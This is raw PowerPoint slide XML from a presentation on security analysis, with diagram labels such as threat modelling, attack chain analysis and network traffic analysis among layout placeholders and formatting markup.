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notesSlides/notesSlide2.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custLinFactNeighborX="6620" custLinFactNeighborY="4504">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custLinFactNeighborX="0" custLinFactNeighborY="-24138">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0112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82877" y="924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01611" y="27975"/>
        <a:ext cx="6722821" cy="346292"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4E3FA896-3C96-4E8C-8520-DEF6B3F51C64}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="79080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82877" y="59892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01611" y="617655"/>
        <a:ext cx="6722821" cy="346292"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E8242749-3559-43B1-B4DE-0F9212422515}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="138048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14844" y="1205886"/>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33578" y="1224620"/>
        <a:ext cx="6722821" cy="346292"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{496E6517-4980-4EC9-A396-32CBD0797034}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="1953217"/>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82877" y="177828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01611" y="1797016"/>
        <a:ext cx="6722821" cy="346292"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2D769025-E9E3-40C6-BD44-075BFB578E82}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="255984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82877" y="236796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01611" y="2386696"/>
        <a:ext cx="6722821" cy="346292"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FED8AE8F-0AFF-42F9-B0B8-8CE702CB0969}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="314952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82877" y="295764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01611" y="2976376"/>
        <a:ext cx="672282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2944115" y="1983955"/>
          <a:ext cx="1924917" cy="86534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Modelling</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2986358" y="2026198"/>
        <a:ext cx="1840431" cy="780860"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DA583868-6DD2-44F6-855A-A89772E52EC8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16200000">
          <a:off x="3400546" y="1477927"/>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3111078" y="415"/>
          <a:ext cx="1590990"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Threat modelling</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3158502" y="47839"/>
        <a:ext cx="1496142" cy="876636"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B02D8259-CDC0-47D3-A863-C8774AA360BA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="20082078">
          <a:off x="4792714" y="1853671"/>
          <a:ext cx="609745" cy="0"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="60974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5373221" y="768935"/>
          <a:ext cx="198324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Attack chain analysis</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5420645" y="816359"/>
        <a:ext cx="1888399" cy="876636"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F63DAE2A-CEE0-4F00-B8C0-372D6A837670}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="1187838">
          <a:off x="4862830" y="2798621"/>
          <a:ext cx="209852" cy="0"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="20985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066481" y="2692672"/>
          <a:ext cx="191269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Behavioural modelling</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5113905" y="2740096"/>
        <a:ext cx="1817849" cy="876636"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E05F3E78-0E8B-4B4B-B2FD-55CE37D794F8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="3400546" y="3355329"/>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2701976" y="3861356"/>
          <a:ext cx="2409194"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Risk assessment</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2749400" y="3908780"/>
        <a:ext cx="2314346" cy="876636"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E5184D91-0271-4994-9CE3-FE5CD5499900}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="9863928">
          <a:off x="2304641" y="2772977"/>
          <a:ext cx="651474" cy="0"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="65147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670831" y="2604616"/>
          <a:ext cx="1645811"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Network traffic analysis</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="718255" y="2652040"/>
        <a:ext cx="1550963" cy="876636"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E32A33EE-A661-49C7-BF3E-8A1F45288B12}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="12528216">
          <a:off x="2390204" y="1796638"/>
          <a:ext cx="777557" cy="0"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="77755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791076" y="670725"/>
          <a:ext cx="1647229"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Scenario modelling</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="838500" y="718149"/>
        <a:ext cx="1552381" cy="8766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 name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104877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7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0145284F-5CA7-4F9C-9178-B57AA3CAF91E}" type="datetimeFigureOut">
              <a:rPr lang="en-IN" smtClean="0"/>
              <a:t>15-06-2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104878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8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DC59E6E6-AA52-4FC6-9E02-7DEAFB8870EB}"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Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noRot="1" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048616" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048617" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{DC59E6E6-AA52-4FC6-9E02-7DEAFB8870EB}"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77" name="Slide Image Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noRot="1" noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048678" name="Notes Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr dirty="0" lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048679" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>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2" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="Group 18"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="546100" y="-4763"/>
            <a:ext cx="5014912" cy="6862763"/>
            <a:chOff x="2928938" y="-4763"/>
            <a:chExt cx="5014912" cy="6862763"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1048688"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689"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690"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691"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692"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693"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694"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695"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96"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697" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5332412" y="5883275"/>
            <a:ext cx="4324044" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104869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2" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048747"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748"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49"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p>
            <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/15/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048751" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104875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04"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705"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1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104873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4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4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42"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43"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4"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45" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104874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4" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048699"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700"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02" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>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4" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104875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6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6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62"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63"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64"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65" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104876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15"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716"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7"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19" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104872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773" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr"/>
          </a:lstStyle>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
            <a:endParaRPr dirty="0" lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104877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5"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76" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104877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0" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048734"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735"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6"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37" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104873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7"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8"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10485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0"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a:xfrm>
            <a:off x="10951856" y="5867131"/>
            <a:ext cx="551167"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8" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048721"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722"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3" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/15/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048724" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104872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753"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754"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5"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6" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/15/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048757" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104875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9"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8"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9"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0"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6"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/15/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048732" name="Footer Placeholder 7"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104873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Date Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/15/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048659" name="Footer Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104866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69" name="Date Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/15/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048670" name="Footer Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048671"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sp>
        <p:nvSpPr>
          <p:cNvPr id="1048767"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68"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9"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70" name="Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/15/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048771" name="Footer Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:endParaRPr lang="en-IN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104877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6" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048709"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710"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11"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Date Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:fld id="{1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/15/2024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1D8BD707-D9CF-40AE-B4C6-C98DA3205C09}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/15/2024</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>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 Id="rId7"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2.png"/><Relationship Id="rId7"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42950" y="1104900"/>
            <a:ext cx="1743075" cy="1333500"/>
            <a:chOff x="742950" y="1104900"/>
            <a:chExt cx="1743075" cy="1333500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="104859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4" name="object 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2667000" y="1292634"/>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5" name="object 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1943100" y="2461290"/>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6" name="object 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-356161" y="3076463"/>
            <a:ext cx="9875536" cy="981710"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr bIns="0" lIns="0" rIns="0" rtlCol="0" tIns="16510" vert="horz" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:p>
            <a:pPr marL="3213735">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="130"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>G</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" lang="en-US" spc="15">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Sitka Small Semibold" pitchFamily="2" charset="0"/>
